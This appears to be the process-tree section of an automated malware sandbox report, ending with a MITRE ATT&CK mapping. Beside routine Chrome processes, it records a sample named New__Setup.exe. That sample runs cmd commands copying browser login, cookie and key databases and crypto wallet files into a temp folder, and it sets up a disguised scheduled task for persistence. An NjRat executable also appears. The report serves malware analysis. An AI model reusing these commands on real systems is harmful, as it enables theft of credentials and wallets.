  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:8
  2⤵
  PID:3892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:8
  2⤵
  PID:3816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:1
  2⤵
  PID:1132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6088 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5044 /prefetch:8
  2⤵
  PID:3660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6256 /prefetch:8
  2⤵
  PID:3156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6000 /prefetch:8
  2⤵
  PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5228 /prefetch:2
  2⤵
  PID:3316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:3816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:8
  2⤵
  PID:3456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
  2⤵
  PID:196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 /prefetch:8
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:8
  2⤵
  PID:1272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1004 /prefetch:8
  2⤵
  PID:1820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4360 /prefetch:1
  2⤵
  PID:2056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:2496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
  2⤵
  PID:3940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
  2⤵
  PID:980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7268 /prefetch:8
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7348 /prefetch:8
  2⤵
  PID:548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6744 /prefetch:8
  2⤵
  PID:2584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7452 /prefetch:8
  2⤵
  PID:1808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7788 /prefetch:1
  2⤵
  PID:1652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8148 /prefetch:8
  2⤵
  PID:3840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
  2⤵
  PID:724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
  2⤵
  PID:3936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:8
  2⤵
  PID:768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:8
  2⤵
  PID:3652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1408 /prefetch:1
  2⤵
  PID:208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6532 /prefetch:8
  2⤵
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6708 /prefetch:8
  2⤵
  PID:544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,3376742968567390529,4491136772345893606,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7064 /prefetch:8
  2⤵
  PID:3816

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1732

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3172

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap25290:96:7zEvent10188
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3880

C:\Users\Admin\Desktop\Setup___Pass___1234.exe
"C:\Users\Admin\Desktop\Setup___Pass___1234.exe"
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3092
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:3676

C:\Users\Admin\Desktop\New__Setup.exe
"C:\Users\Admin\Desktop\New__Setup.exe"
1⤵
- Suspicious use of SetThreadContext
PID:3868
- C:\Users\Admin\Desktop\New__Setup.exe
  "C:\Users\Admin\Desktop\New__Setup.exe"
  2⤵
  - Checks processor information in registry
  - NTFS ADS
  PID:3272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\Desktop\*.txt" "C:\Users\Admin\AppData\Local\Temp\3343\_Files"
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /U /C DIR "C:\Users\Admin\wallet.dat" /S /B /A-D
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /U /C DIR "C:\Users\Admin\UTC--2*" /S /B /A-D
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Local\google\chrome\User Data\Default\Web Data" "C:\Users\Admin\AppData\Local\Temp\3343\_Chrome\default_webdata.db"
    3⤵
    PID:3248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Local\google\chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\3343\_Chrome\default_logins.db"
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Local\google\chrome\User Data\Default\Cookies" "C:\Users\Admin\AppData\Local\Temp\3343\_Chrome\default_cookies.db"
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Local\google\chrome\User Data\Default\Network\Cookies" "C:\Users\Admin\AppData\Local\Temp\3343\_Chrome\default_cookies.db"
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/fz3l0wwl.Admin\formhistory.sqlite" "C:\Users\Admin\AppData\Local\Temp\3343\_Firefox\formhistory.sqlite"
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/fz3l0wwl.Admin\cookies.sqlite" "C:\Users\Admin\AppData\Local\Temp\3343\_Firefox\cookies.sqlite"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/fz3l0wwl.Admin\signons.sqlite" "C:\Users\Admin\AppData\Local\Temp\3343\_Firefox\signons.sqlite"
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/fz3l0wwl.Admin\logins.json" "C:\Users\Admin\AppData\Local\Temp\3343\_Firefox\logins.json"
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/fz3l0wwl.Admin\key3.db" "C:\Users\Admin\AppData\Local\Temp\3343\_Firefox\key3.db"
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c copy /Y "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/fz3l0wwl.Admin\key4.db" "C:\Users\Admin\AppData\Local\Temp\3343\_Firefox\key4.db"
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c expand.exe "C:\Users\Admin\AppData\Local\Temp\tsGcnKr.tmp" -F:* "C:\Users\Admin\AppData\Roaming\ServiceGet" & schtasks /create /tn \Service\Diagnostic /tr """"C:\Users\Admin\AppData\Roaming\ServiceGet\Dekkoce.exe""" """C:\Users\Admin\AppData\Roaming\ServiceGet\Dekkoce.dat"""" /st 00:01 /du 9600:49 /sc once /ri 1 /f
    3⤵
    PID:3632
  - - C:\Windows\SysWOW64\expand.exe
      expand.exe "C:\Users\Admin\AppData\Local\Temp\tsGcnKr.tmp" -F:* "C:\Users\Admin\AppData\Roaming\ServiceGet"
      4⤵
      Drops file in Windows directory
      PID:2996
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn \Service\Diagnostic /tr """"C:\Users\Admin\AppData\Roaming\ServiceGet\Dekkoce.exe""" """C:\Users\Admin\AppData\Roaming\ServiceGet\Dekkoce.dat"""" /st 00:01 /du 9600:49 /sc once /ri 1 /f
      4⤵
      Creates scheduled task(s)
      PID:624

C:\Users\Admin\AppData\Roaming\ServiceGet\Dekkoce.exe
C:\Users\Admin\AppData\Roaming\ServiceGet\Dekkoce.exe "C:\Users\Admin\AppData\Roaming\ServiceGet\Dekkoce.dat"
1⤵
- Executes dropped EXE
PID:3292

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3b8
1⤵
PID:1096

C:\Users\Admin\Desktop\NjRat 0.7D Green Edition by im523.exe
"C:\Users\Admin\Desktop\NjRat 0.7D Green Edition by im523.exe"
1⤵
PID:2832
- C:\Windows\SysWOW64\fondue.exe
  "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
  2⤵
  PID:3880
- - C:\Windows\System32\FonDUE.EXE
    "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
    3⤵
    PID:2076

C:\Users\Admin\Desktop\NjRat 0.7D Green Edition by im523.exe
"C:\Users\Admin\Desktop\NjRat 0.7D Green Edition by im523.exe"
1⤵
PID:724
- C:\Windows\SysWOW64\fondue.exe
  "C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
  2⤵
  PID:3616
- - C:\Windows\System32\FonDUE.EXE
    "C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
    3⤵
    PID:3612

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery